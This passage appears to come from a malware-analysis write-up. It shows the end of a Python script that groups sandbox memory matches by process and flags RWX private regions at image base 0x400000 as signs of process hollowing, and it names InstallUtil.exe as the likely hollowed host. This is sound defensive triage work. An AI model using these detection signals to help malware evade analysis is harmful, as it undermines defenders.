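    """Group matches by process into a set of (stage, base, protection) tuples."""
    out = defaultdict(set)
    for rec in parse_memory_matches(text):
        out[rec["process"]].add((rec["stage"], rec["base"], rec["protection"]))
    return dict(out)


def rwx_image_base_hits(text):
    """Processes with a hit at 0x400000 in a PAGE_EXECUTE_READWRITE region dumped at stage 0.

    A PE mapped by the loader is MEM_IMAGE and not writable, so an RWX private
    region at the image base before the process runs is the dump to pull first.
    """
    return sorted({
        r["process"] for r in parse_memory_matches(text)
        if r["base"] == 0x400000 and r["stage"] == 0 and r["protection"] == "PAGE_EXECUTE_READWRITE"
    })


if __name__ == "__main__":
    for proc, hits in sorted(summarize(SAMPLE_LINES).items()):
        print(proc)
        for stage, base, prot in sorted(hits):
            print(f"  stage {stage}  base 0x{base:08x}  {prot}")
    print("RWX at image base before start:", rwx_image_base_hits(SAMPLE_LINES))
```

On the lines above, the two hollowed-looking regions are the 0x400000 RWX, MEM_PRIVATE dumps in InstallUtil.exe (indices 17 and 26), while the kyFBQxVbsg.exe and Qerdo.exe hits sit in ordinary read-write heap regions dumped at the end of the run. Run the script against the full match list to get the same grouping for every process in the report.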
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: cmd.exe 17_2_00405671